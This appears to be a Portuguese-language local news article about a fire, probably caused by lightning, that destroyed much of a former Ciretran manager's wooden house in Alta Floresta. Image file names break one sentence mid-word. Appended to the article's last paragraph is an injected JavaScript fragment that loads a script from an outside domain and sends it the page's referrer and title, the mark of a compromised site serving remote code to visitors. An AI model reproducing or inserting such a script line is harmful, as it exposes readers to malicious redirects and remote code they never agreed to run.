Capa / Em Destaque / Incêndio provavelmente causado por raio queima residência de ex-gerente da Ciretran

Incêndio provavelmente causado por raio queima residência de ex-gerente da Ciretran

incendio-casa-do-elson-quadros3Um incêndio causado, provavelmente por um raio, que teria atingido o aparelho de ar condicionado de um dos quartos, queimou grande parte da residência do ex-diretor da 20ª Ciretran Elson Quadros, agora há pouco (por volta das 9:00h) na região central de Alta Floresta. Por sorte não havia ninguém em casa. “Foi muito rápido, quando vi já estava queimando”, disse um trabalhador que estava próximo e ajudou a chamar o Corpo de Bombeiros.

A casa é antiga e toda de madeira, o que deve ter fac incendio-casa-do-elson-quadros incendio-casa-do-elson-quadros2
incendio-casa-do-elson-quadros4
ilitado o alastramento das chamas. Outras casas e escritórios de contabilidade existem praticamente coligados à residência que estava em chamas, mas não foram atingidos graças a agilidade e destreza dos homens do CB que se esforçaram em apagar as chamas. Populares, inclusive familiares ajudaram no combate ao fogo que, em 20 minutos já estava controlado.

Elson Quadros é proprietário de uma auto escola e despachante e está na capital do estado, resolvendo questões relativas á sua profissão. Ele já foi avisado sobre o sinistro que atingiu a sua casa.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top